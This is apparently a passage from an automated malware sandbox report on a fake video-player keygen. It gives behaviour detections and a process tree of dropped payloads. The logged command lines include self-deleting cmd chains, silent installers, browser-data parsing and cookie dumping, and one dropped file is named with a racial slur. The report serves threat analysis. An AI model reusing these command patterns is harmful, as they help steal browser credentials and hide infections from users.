3a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e askinstall20.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 askinstall20.exe -
Runs ping.exe 1 TTPs 2 IoCs
pid Process 4816 PING.EXE 2456 PING.EXE -
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 112 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 104 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 212 setups.tmp 212 setups.tmp 1968 multitimer.exe 1968 multitimer.exe 1968 multitimer.exe 1968 multitimer.exe 1968 multitimer.exe 1968 multitimer.exe 1968 multitimer.exe 1968 multitimer.exe 1968 multitimer.exe 1968 multitimer.exe 1968 multitimer.exe 1968 multitimer.exe 1968 multitimer.exe 1968 multitimer.exe 1968 multitimer.exe 1968 multitimer.exe 1968 multitimer.exe 1968 multitimer.exe 1968 multitimer.exe 1968 multitimer.exe 1968 multitimer.exe 1968 multitimer.exe 1968 multitimer.exe 1968 multitimer.exe 1968 multitimer.exe 1968 multitimer.exe 1968 multitimer.exe 1968 multitimer.exe 1968 multitimer.exe 1968 multitimer.exe 1968 multitimer.exe 1968 multitimer.exe 1968 multitimer.exe 1968 multitimer.exe 1968 multitimer.exe 1968 multitimer.exe 1968 multitimer.exe 1968 multitimer.exe 1968 multitimer.exe 1968 multitimer.exe 1968 multitimer.exe 1968 multitimer.exe 1968 multitimer.exe 1968 multitimer.exe 1968 multitimer.exe 1968 multitimer.exe 1968 multitimer.exe 1968 multitimer.exe 1968 multitimer.exe 1968 multitimer.exe 1968 multitimer.exe 1968 multitimer.exe 1968 multitimer.exe 1968 multitimer.exe 1968 multitimer.exe 1968 multitimer.exe 1968 multitimer.exe 1968 multitimer.exe 1968 multitimer.exe 1968 multitimer.exe 1968 multitimer.exe 1968 multitimer.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
pid Process 4516 MicrosoftEdgeCP.exe 4516 nigger.exe -
Suspicious use of AdjustPrivilegeToken 47 IoCs
description pid Process Token: SeDebugPrivilege 1780 Setup.exe Token: SeCreateTokenPrivilege 224 askinstall20.exe Token: SeAssignPrimaryTokenPrivilege 224 askinstall20.exe Token: SeLockMemoryPrivilege 224 askinstall20.exe Token: SeIncreaseQuotaPrivilege 224 askinstall20.exe Token: SeMachineAccountPrivilege 224 askinstall20.exe Token: SeTcbPrivilege 224 askinstall20.exe Token: SeSecurityPrivilege 224 askinstall20.exe Token: SeTakeOwnershipPrivilege 224 askinstall20.exe Token: SeLoadDriverPrivilege 224 askinstall20.exe Token: SeSystemProfilePrivilege 224 askinstall20.exe Token: SeSystemtimePrivilege 224 askinstall20.exe Token: SeProfSingleProcessPrivilege 224 askinstall20.exe Token: SeIncBasePriorityPrivilege 224 askinstall20.exe Token: SeCreatePagefilePrivilege 224 askinstall20.exe Token: SeCreatePermanentPrivilege 224 askinstall20.exe Token: SeBackupPrivilege 224 askinstall20.exe Token: SeRestorePrivilege 224 askinstall20.exe Token: SeShutdownPrivilege 224 askinstall20.exe Token: SeDebugPrivilege 224 askinstall20.exe Token: SeAuditPrivilege 224 askinstall20.exe Token: SeSystemEnvironmentPrivilege 224 askinstall20.exe Token: SeChangeNotifyPrivilege 224 askinstall20.exe Token: SeRemoteShutdownPrivilege 224 askinstall20.exe Token: SeUndockPrivilege 224 askinstall20.exe Token: SeSyncAgentPrivilege 224 askinstall20.exe Token: SeEnableDelegationPrivilege 224 askinstall20.exe Token: SeManageVolumePrivilege 224 askinstall20.exe Token: SeImpersonatePrivilege 224 askinstall20.exe Token: SeCreateGlobalPrivilege 224 askinstall20.exe Token: 31 224 askinstall20.exe Token: 32 224 askinstall20.exe Token: 33 224 askinstall20.exe Token: 34 224 askinstall20.exe Token: 35 224 askinstall20.exe Token: SeDebugPrivilege 3948 taskkill.exe Token: SeDebugPrivilege 4652 multitimer.exe Token: SeDebugPrivilege 4200 MicrosoftEdge.exe Token: SeDebugPrivilege 4200 MicrosoftEdge.exe Token: SeDebugPrivilege 4200 MicrosoftEdge.exe Token: SeDebugPrivilege 4200 MicrosoftEdge.exe Token: SeDebugPrivilege 884 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 884 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 884 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 884 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 1968 multitimer.exe Token: SeManageVolumePrivilege 2056 md2_2efs.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 4628 setups.exe 212 setups.tmp 4200 MicrosoftEdge.exe 4516 MicrosoftEdgeCP.exe 4516 MicrosoftEdgeCP.exe -
Suspicious use of WriteProcessMemory 54 IoCs
description pid Process procid_target PID 4692 wrote to memory of 3884 4692 3d_Video_Player_4_5_serial_maker.exe 78 PID 4692 wrote to memory of 3884 4692 3d_Video_Player_4_5_serial_maker.exe 78 PID 4692 wrote to memory of 3884 4692 3d_Video_Player_4_5_serial_maker.exe 78 PID 3884 wrote to memory of 4060 3884 cmd.exe 81 PID 3884 wrote to memory of 4060 3884 cmd.exe 81 PID 3884 wrote to memory of 4060 3884 cmd.exe 81 PID 3884 wrote to memory of 4052 3884 cmd.exe 82 PID 3884 wrote to memory of 4052 3884 cmd.exe 82 PID 3884 wrote to memory of 4052 3884 cmd.exe 82 PID 3884 wrote to memory of 2076 3884 cmd.exe 83 PID 3884 wrote to memory of 2076 3884 cmd.exe 83 PID 3884 wrote to memory of 2076 3884 cmd.exe 83 PID 3884 wrote to memory of 4420 3884 cmd.exe 84 PID 3884 wrote to memory of 4420 3884 cmd.exe 84 PID 3884 wrote to memory of 4420 3884 cmd.exe 84 PID 4060 wrote to memory of 1468 4060 keygen-pr.exe 85 PID 4060 wrote to memory of 1468 4060 keygen-pr.exe 85 PID 4060 wrote to memory of 1468 4060 keygen-pr.exe 85 PID 4420 wrote to memory of 1780 4420 keygen-step-4.exe 86 PID 4420 wrote to memory of 1780 4420 keygen-step-4.exe 86 PID 1468 wrote to memory of 2212 1468 key.exe 87 PID 1468 wrote to memory of 2212 1468 key.exe 87 PID 1468 wrote to memory of 2212 1468 key.exe 87 PID 2076 wrote to memory of 2292 2076 keygen-step-3.exe 88 PID 2076 wrote to memory of 2292 2076 keygen-step-3.exe 88 PID 2076 wrote to memory of 2292 2076 keygen-step-3.exe 88 PID 2292 wrote to memory of 2456 2292 cmd.exe 90 PID 2292 wrote to memory of 2456 2292 cmd.exe 90 PID 2292 wrote to memory of 2456 2292 cmd.exe 90 PID 1780 wrote to memory of 4652 1780 Setup.exe 91 PID 1780 wrote to memory of 4652 1780 Setup.exe 91 PID 1780 wrote to memory of 4628 1780 Setup.exe 92 PID 1780 wrote to memory of 4628 1780 Setup.exe 92 PID 1780 wrote to memory of 4628 1780 Setup.exe 92 PID 4420 wrote to memory of 224 4420 keygen-step-4.exe 93 PID 4420 wrote to memory of 224 4420 keygen-step-4.exe 93 PID 4420 wrote to memory of 224 4420 keygen-step-4.exe 93 PID 4628 wrote to memory of 212 4628 setups.exe 94 PID 4628 wrote to memory of 212 4628 setups.exe 94 PID 4628 wrote to memory of 212 4628 setups.exe 94 PID 224 wrote to memory of 5044 224 askinstall20.exe 96 PID 224 wrote to memory of 5044 224 askinstall20.exe 96 PID 224 wrote to memory of 5044 224 askinstall20.exe 96 PID 5044 wrote to memory of 3948 5044 cmd.exe 98 PID 5044 wrote to memory of 3948 5044 cmd.exe 98 PID 5044 wrote to memory of 3948 5044 cmd.exe 98 PID 4652 wrote to memory of 2924 4652 multitimer.exe 103 PID 4652 wrote to memory of 2924 4652 multitimer.exe 103 PID 4420 wrote to memory of 2056 4420 keygen-step-4.exe 104 PID 4420 wrote to memory of 2056 4420 keygen-step-4.exe 104 PID 4420 wrote to memory of 2056 4420 keygen-step-4.exe 104 PID 2924 wrote to memory of 1968 2924 multitimer.exe 105 PID 2924 wrote to memory of 1968 2924 multitimer.exe 105 PID 4516 wrote to memory of 884 4516 nigger.exe 102
Processes
-
C:\Users\Admin\AppData\Local\Temp\3d_Video_Player_4_5_serial_maker.exe"C:\Users\Admin\AppData\Local\Temp\3d_Video_Player_4_5_serial_maker.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4692 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:3884 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exekeygen-pr.exe -p83fsase3Ge3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4060 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1468 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat5⤵PID:2212
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exekeygen-step-1.exe3⤵
- Executes dropped EXE
PID:4052
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exekeygen-step-3.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2076 -
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:2292 -
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- Runs ping.exe
PID:2456
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exekeygen-step-4.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4420 -
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1780 -
C:\Users\Admin\AppData\Local\Temp\OLMZPKVNFT\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\OLMZPKVNFT\multitimer.exe" 0 3060197d33d91c80.94013368 0 1015⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4652 -
C:\Users\Admin\AppData\Local\Temp\OLMZPKVNFT\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\OLMZPKVNFT\multitimer.exe" 1 3.1616696293.605cd3e5ee8ba 1016⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:2924 -
C:\Users\Admin\AppData\Local\Temp\OLMZPKVNFT\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\OLMZPKVNFT\multitimer.exe" 2 3.1616696293.605cd3e5ee8ba7⤵
- Executes dropped EXE
- Maps connected drives based on registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1968 -
C:\Users\Admin\AppData\Local\Temp\0ik01ur10cb\pv5ie1ibrgt.exe"C:\Users\Admin\AppData\Local\Temp\0ik01ur10cb\pv5ie1ibrgt.exe" /VERYSILENT8⤵PID:4412
-
C:\Users\Admin\AppData\Local\Temp\is-1471L.tmp\pv5ie1ibrgt.tmp"C:\Users\Admin\AppData\Local\Temp\is-1471L.tmp\pv5ie1ibrgt.tmp" /SL5="$A0060,2592217,780800,C:\Users\Admin\AppData\Local\Temp\0ik01ur10cb\pv5ie1ibrgt.exe" /VERYSILENT9⤵PID:5092
-
C:\Users\Admin\AppData\Local\Temp\is-FBPMO.tmp\winlthsth.exe"C:\Users\Admin\AppData\Local\Temp\is-FBPMO.tmp\winlthsth.exe"10⤵PID:3048
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3048 -s 67611⤵
- Program crash
PID:3144
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\xy2pcd2huux\vict.exe"C:\Users\Admin\AppData\Local\Temp\xy2pcd2huux\vict.exe" /VERYSILENT /id=5358⤵PID:4000
-
C:\Users\Admin\AppData\Local\Temp\is-8R7BG.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-8R7BG.tmp\vict.tmp" /SL5="$202DE,870426,780800,C:\Users\Admin\AppData\Local\Temp\xy2pcd2huux\vict.exe" /VERYSILENT /id=5359⤵PID:4180
-
C:\Users\Admin\AppData\Local\Temp\is-02F5Q.tmp\winhost.exe"C:\Users\Admin\AppData\Local\Temp\is-02F5Q.tmp\winhost.exe" 53510⤵PID:1592
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\lc1utliziwt\AwesomePoolU1.exe"C:\Users\Admin\AppData\Local\Temp\lc1utliziwt\AwesomePoolU1.exe"8⤵PID:4104
-
-
C:\Users\Admin\AppData\Local\Temp\ydnqsirapba\cppzot203zc.exe"C:\Users\Admin\AppData\Local\Temp\ydnqsirapba\cppzot203zc.exe" /ustwo INSTALL8⤵PID:1100
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "cppzot203zc.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\ydnqsirapba\cppzot203zc.exe" & exit9⤵PID:5240
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "cppzot203zc.exe" /f10⤵
- Kills process with taskkill
PID:5836
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\zwv1lby1zpn\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\zwv1lby1zpn\Setup3310.exe" /Verysilent /subid=5778⤵PID:1148
-
C:\Users\Admin\AppData\Local\Temp\is-VER3K.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-VER3K.tmp\Setup3310.tmp" /SL5="$5005A,138429,56832,C:\Users\Admin\AppData\Local\Temp\zwv1lby1zpn\Setup3310.exe" /Verysilent /subid=5779⤵PID:2592
-
C:\Users\Admin\AppData\Local\Temp\is-ENBNT.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-ENBNT.tmp\Setup.exe" /Verysilent10⤵PID:2344
-
C:\Program Files (x86)\Versium Research\Versium Research\customer5.exe"C:\Program Files (x86)\Versium Research\Versium Research\customer5.exe"11⤵PID:5252
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\main.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\main.exe"12⤵PID:5560
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\parse.exeparse.exe -f json -b edge13⤵PID:5796
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\parse.exeparse.exe -f json -b chrome13⤵PID:5920
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\parse.exeparse.exe -f json -b firefox13⤵PID:2108
-
-
-
-
C:\Program Files (x86)\Versium Research\Versium Research\hjjgaa.exe"C:\Program Files (x86)\Versium Research\Versium Research\hjjgaa.exe"11⤵PID:5284
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵PID:3280
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵PID:5140
-
-
-
C:\Program Files (x86)\Versium Research\Versium Research\RunWW.exe"C:\Program Files (x86)\Versium Research\Versium Research\RunWW.exe"11⤵PID:5312
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im RunWW.exe /f & timeout /t 6 & del /f /q "C:\Program Files (x86)\Versium Research\Versium Research\RunWW.exe" & del C:\ProgramData\*.dll & exit12⤵PID:5396
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im RunWW.exe /f13⤵
- Kills process with taskkill
PID:5948
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 613⤵
- Delays execution with timeout.exe
PID:5908
-
-
-
-
C:\Program Files (x86)\Versium Research\Versium Research\jg7_7wjg.exe"C:\Program Files (x86)\Versium Research\Versium Research\jg7_7wjg.exe"11⤵PID:5340
-
-
C:\Program Files (x86)\Versium Research\Versium Research\vlcplayer.exe"C:\Program Files (x86)\Versium Research\Versium Research\vlcplayer.exe"11⤵PID:5400
-
C:\Users\Admin\AppData\Local\Temp\Services.exe"C:\Users\Admin\AppData\Local\Temp\Services.exe"12⤵PID:4940
-
-
-
C:\Program Files (x86)\Versium Research\Versium Research\Z7pGMA6DzfieVAOXDEtkk7kL.exe"C:\Program Files (x86)\Versium Research\Versium Research\Z7pGMA6DzfieVAOXDEtkk7kL.exe"11⤵PID:5416
-
C:\Users\Admin\Documents\6P3WUZxCm8mlX3pyqfcQd3N7.exe"C:\Users\Admin\Documents\6P3WUZxCm8mlX3pyqfcQd3N7.exe"12⤵PID:3664
-
C:\Users\Admin\Documents\QVpgYfF4b9fuaH8wzweuo0OL.exe"C:\Users\Admin\Documents\QVpgYfF4b9fuaH8wzweuo0OL.exe"13⤵PID:5412
-
C:\Users\Admin\Documents\QVpgYfF4b9fuaH8wzweuo0OL.exe"C:\Users\Admin\Documents\QVpgYfF4b9fuaH8wzweuo0OL.exe"14⤵PID:3800
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3800 -s 10415⤵
- Program crash
PID:220
-
-
-
C:\Program Files (x86)\Versium Research\Versium Research\nigger.exe"C:\Program Files (x86)\Versium Research\Versium Research\nigger.exe"14⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:4516 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{jzuD-qTtc7-9QZR-PFWOG}\53786901574.exe"15⤵PID:960
-
C:\Users\Admin\AppData\Local\Temp\{jzuD-qTtc7-9QZR-PFWOG}\53786901574.exe"C:\Users\Admin\AppData\Local\Temp\{jzuD-qTtc7-9QZR-PFWOG}\53786901574.exe"16⤵PID:840
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im 53786901574.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\{jzuD-qTtc7-9QZR-PFWOG}\53786901574.exe" & del C:\ProgramData\*.dll & exit17⤵PID:6820
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im 53786901574.exe /f18⤵
- Kills process with taskkill
PID:8752
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{jzuD-qTtc7-9QZR-PFWOG}\96044666073.exe" /mix15⤵PID:8144
-
C:\Users\Admin\AppData\Local\Temp\{jzuD-qTtc7-9QZR-PFWOG}\96044666073.exe"C:\Users\Admin\AppData\Local\Temp\{jzuD-qTtc7-9QZR-PFWOG}\96044666073.exe" /mix16⤵PID:8012
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c rd /s /q C:\Users\Admin\AppData\Local\Temp\gdtWHebJ & timeout 3 & del /f /q "C:\Users\Admin\AppData\Local\Temp\{jzuD-qTtc7-9QZR-PFWOG}\96044666073.exe"17⤵PID:6212
-
C:\Windows\SysWOW64\timeout.exetimeout 318⤵
- Delays execution with timeout.exe
PID:4980
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "nigger.exe" /f & erase "C:\Program Files (x86)\Versium Research\Versium Research\nigger.exe" & exit15⤵PID:3772
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "nigger.exe" /f16⤵
- Kills process with taskkill
PID:3392
-
-
-
-
-
C:\Users\Admin\Documents\HdmjmU4pf1ObVSuefJm6AfWc.exe"C:\Users\Admin\Documents\HdmjmU4pf1ObVSuefJm6AfWc.exe"13⤵PID:6940
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6940 -s 161614⤵
- Program crash
PID:2632
-
-
-
C:\Users\Admin\Documents\paTKlKH8DP9g8wJBdqdV8RJ7.exe"C:\Users\Admin\Documents\paTKlKH8DP9g8wJBdqdV8RJ7.exe"13⤵PID:5392
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{1efU-CYUJj-yjnk-vQlfW}\83906350249.exe"14⤵PID:5492
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{1efU-CYUJj-yjnk-vQlfW}\01767470840.exe" /mix14⤵PID:7276
-
C:\Users\Admin\AppData\Local\Temp\{1efU-CYUJj-yjnk-vQlfW}\01767470840.exe"C:\Users\Admin\AppData\Local\Temp\{1efU-CYUJj-yjnk-vQlfW}\01767470840.exe" /mix15⤵PID:7512
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "paTKlKH8DP9g8wJBdqdV8RJ7.exe" /f & erase "C:\Users\Admin\Documents\paTKlKH8DP9g8wJBdqdV8RJ7.exe" & exit14⤵PID:7624
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "paTKlKH8DP9g8wJBdqdV8RJ7.exe" /f15⤵
- Kills process with taskkill
PID:7888
-
-
-
-
C:\Users\Admin\Documents\3CX3JMUHbtEuuNWDris2jtUt.exe"C:\Users\Admin\Documents\3CX3JMUHbtEuuNWDris2jtUt.exe"13⤵PID:5604
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5604 -s 114014⤵
- Program crash
PID:196
-
-
-
C:\Users\Admin\Documents\rnOeOSbu6uFBi8EeHyw0oKiS.exe"C:\Users\Admin\Documents\rnOeOSbu6uFBi8EeHyw0oKiS.exe"13⤵PID:4304
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{WBXb-KnH1Y-KP90-H9XMB}\12075779741.exe"14⤵PID:7540
-
C:\Users\Admin\AppData\Local\Temp\{WBXb-KnH1Y-KP90-H9XMB}\12075779741.exe"C:\Users\Admin\AppData\Local\Temp\{WBXb-KnH1Y-KP90-H9XMB}\12075779741.exe"15⤵PID:7792
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im 12075779741.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\{WBXb-KnH1Y-KP90-H9XMB}\12075779741.exe" & del C:\ProgramData\*.dll & exit16⤵PID:2452
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im 12075779741.exe /f17⤵
- Kills process with taskkill
PID:7616
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{WBXb-KnH1Y-KP90-H9XMB}\29883956094.exe" /mix14⤵PID:8048
-
C:\Users\Admin\AppData\Local\Temp\{WBXb-KnH1Y-KP90-H9XMB}\29883956094.exe"C:\Users\Admin\AppData\Local\Temp\{WBXb-KnH1Y-KP90-H9XMB}\29883956094.exe" /mix15⤵PID:7056
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c rd /s /q C:\Users\Admin\AppData\Local\Temp\ihQOIIuQ & timeout 3 & del /f /q "C:\Users\Admin\AppData\Local\Temp\{WBXb-KnH1Y-KP90-H9XMB}\29883956094.exe"16⤵PID:8168
-
C:\Windows\SysWOW64\timeout.exetimeout 317⤵
- Delays execution with timeout.exe
PID:5400
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "rnOeOSbu6uFBi8EeHyw0oKiS.exe" /f & erase "C:\Users\Admin\Documents\rnOeOSbu6uFBi8EeHyw0oKiS.exe" & exit14⤵PID:4780
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "rnOeOSbu6uFBi8EeHyw0oKiS.exe" /f15⤵
- Kills process with taskkill
PID:7548
-
-
-
-
C:\Users\Admin\Documents\HJQWrOFxHpLAsLwxZyHySZQO.exe"C:\Users\Admin\Documents\HJQWrOFxHpLAsLwxZyHySZQO.exe"13⤵PID:5704
-
C:\Users\Admin\Documents\HJQWrOFxHpLAsLwxZyHySZQO.exe"C:\Users\Admin\Documents\HJQWrOFxHpLAsLwxZyHySZQO.exe"14⤵PID:5264
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{2oDP-Nhzpb-Ra2c-9RDpY}\19360733981.exe"15⤵PID:3892
-
C:\Users\Admin\AppData\Local\Temp\{2oDP-Nhzpb-Ra2c-9RDpY}\19360733981.exe"C:\Users\Admin\AppData\Local\Temp\{2oDP-Nhzpb-Ra2c-9RDpY}\19360733981.exe"16⤵PID:836
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im 19360733981.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\{2oDP-Nhzpb-Ra2c-9RDpY}\19360733981.exe" & del C:\ProgramData\*.dll & exit17⤵PID:8996
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im 19360733981.exe /f18⤵
- Kills process with taskkill
PID:2656
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{2oDP-Nhzpb-Ra2c-9RDpY}\42185651666.exe" /mix15⤵PID:7864
-
C:\Users\Admin\AppData\Local\Temp\{2oDP-Nhzpb-Ra2c-9RDpY}\42185651666.exe"C:\Users\Admin\AppData\Local\Temp\{2oDP-Nhzpb-Ra2c-9RDpY}\42185651666.exe" /mix16⤵PID:5084
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c rd /s /q C:\Users\Admin\AppData\Local\Temp\cogGNbdkGuMF & timeout 3 & del /f /q "C:\Users\Admin\AppData\Local\Temp\{2oDP-Nhzpb-Ra2c-9RDpY}\42185651666.exe"17⤵PID:640
-
C:\Windows\SysWOW64\timeout.exetimeout 318⤵
- Delays execution with timeout.exe
PID:8464
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "HJQWrOFxHpLAsLwxZyHySZQO.exe" /f & erase "C:\Users\Admin\Documents\HJQWrOFxHpLAsLwxZyHySZQO.exe" & exit15⤵PID:7696
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "HJQWrOFxHpLAsLwxZyHySZQO.exe" /f16⤵
- Kills process with taskkill
PID:7444
-
-
-
-
C:\Program Files (x86)\Versium Research\Versium Research\nigger.exe"C:\Program Files (x86)\Versium Research\Versium Research\nigger.exe"14⤵PID:4336
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{GeZW-Ot438-dWD2-vmN6q}\31539907015.exe"15⤵PID:1528
-
C:\Users\Admin\AppData\Local\Temp\{GeZW-Ot438-dWD2-vmN6q}\31539907015.exe"C:\Users\Admin\AppData\Local\Temp\{GeZW-Ot438-dWD2-vmN6q}\31539907015.exe"16⤵PID:7312
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im 31539907015.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\{GeZW-Ot438-dWD2-vmN6q}\31539907015.exe" & del C:\ProgramData\*.dll & exit17⤵PID:7060
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im 31539907015.exe /f18⤵
- Kills process with taskkill
PID:8336
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{GeZW-Ot438-dWD2-vmN6q}\74196253713.exe" /mix15⤵PID:7316
-
